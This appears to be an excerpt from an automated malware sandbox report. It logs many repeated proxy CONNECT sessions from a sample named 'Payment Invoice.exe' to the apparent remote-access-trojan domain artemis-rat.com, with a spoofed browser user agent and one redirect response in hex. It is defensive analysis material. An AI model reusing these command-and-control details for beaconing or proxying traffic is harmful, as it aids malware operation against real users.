                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.823797941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.327944994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.214550018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.823890924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1767192.168.2.454933202.166.219.8041537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.327498913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1768192.168.2.455042162.241.46.6607087076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.329611063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.526756048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.620902061 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.621131897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:47.714215040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:59.823689938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1769192.168.2.45502665.108.9.181807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.329705954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.329349995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.386379957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.386732101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:47.215514898 CET466INHTTP/1.1 301 Moved Permanently
                                                                Date: Mon, 11 Mar 2024 15:15:47 GMT
                                                                Server: Apache
                                                                Location: https://artemis-rat.com:443/500.shtml
                                                                Content-Length: 245
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 3a 34 34 33 2f 35 30 30 2e 73 68 74 6d 6c 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://artemis-rat.com:443/500.shtml">here</a>.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1770192.168.2.451295159.223.71.71590987076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.361577988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.474495888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.564016104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.660720110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:47.776726007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1771192.168.2.45503274.118.80.24431287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.361592054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1772192.168.2.453822135.148.10.16167167076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.364905119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.526833057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1773192.168.2.45347098.178.72.21109197076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.373675108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1774192.168.2.45131450.63.12.3393677076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.377012968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.526819944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.620943069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.621129990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:47.714236975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1775192.168.2.454028192.9.241.51265687076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.377013922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1776192.168.2.45390991.134.140.16054017076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.415369034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.011385918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.620927095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1777192.168.2.451312154.16.116.16625127076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.418338060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.526954889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.620953083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.621104002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:47.714240074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:59.823693037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:11.823626041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:35.823669910 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1778192.168.2.453845176.113.157.149374177076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.420336008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1779192.168.2.455168184.170.245.14841457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.455024004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1780192.168.2.453911104.248.151.220639977076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.462100983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.526954889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.620975018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.621149063 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:47.714246988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:59.823707104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:11.827429056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:35.823745966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:23.823843002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1781192.168.2.453868212.47.245.57163797076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:23.468322039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.474668026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:29.564023018 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:35.660742998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:47.776720047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1782192.168.2.453872185.32.6.12141537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:24.909383059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1783192.168.2.455145142.54.228.19341457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:24.956013918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1784192.168.2.455170111.90.150.10910807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:24.958496094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1785192.168.2.455161175.183.82.221807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:24.958700895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1786192.168.2.453876212.42.99.2241457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:24.959244967 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1787192.168.2.451415104.36.166.34479357076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:24.987330914 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.003122091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.078843117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:37.089587927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1788192.168.2.45517245.125.222.97472397076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:24.987540007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


